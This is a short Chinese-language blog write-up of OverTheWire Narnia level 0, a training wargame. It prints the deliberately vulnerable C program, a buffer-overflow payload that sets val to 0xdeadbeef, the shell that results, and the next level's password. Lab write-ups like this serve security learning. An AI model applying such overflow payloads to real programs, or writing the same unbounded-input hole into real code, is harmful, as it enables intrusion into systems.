Ch3nyang's blog collections_bookmark

post

 person

about

 category

category

 local_offer

tag

 rss_feed

rss

OverTheWire | (3)
Narnia

calendar_month 2019-10
archive 安全
tag game

There are 3 posts in series OverTheWire.

https://overthewire.org/wargames/narnia/

每关使用 ssh 连接

ssh -p 2226 [email protected]

Level 0–>Level 1

#include <stdio.h>
#include <stdlib.h>

int main(){
    long val=0x41414141;
    char buf[20];

    printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
    printf("Here is your chance: ");
    scanf("%24s",&buf);

    printf("buf: %s\n",buf);
    printf("val: 0x%08x\n",val);

    if(val==0xdeadbeef){
        setreuid(geteuid(),geteuid());
        system("/bin/sh");
    }
    else {
        printf("WAY OFF!!!!\n");
        exit(1);
    }

    return 0;
}

可以看到,有一个大小为 20 的 buf,我们需要通过输入溢出 buf 来覆盖 val 的值。

我们首先做一个简单的尝试:

$ ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: AAAAAAAAAAAAAAAAAAAABCDE
buf: AAAAAAAAAAAAAAAAAAAABCDE
val: 0x45444342
WAY OFF!!!!

值得注意的是,val 的值为 0x45444342,即 EDCB。

/narnia$ python2 -c 'print "A"*20 + "\xef\xbe\xad\xde\x80"'
AAAAAAAAAAAAAAAAAAAAᆳހ
/narnia$ ./narnia0
Correct val's value from 0x41414141 -> 0xdeadbeef!
Here is your chance: AAAAAAAAAAAAAAAAAAAAᆳހ
buf: AAAAAAAAAAAAAAAAAAAAᆳ�
val: 0xdeadbeef
$ cat /etc/narnia_pass/narnia1
eaa6AjYMBB

Series OverTheWire

Comments

Share This Post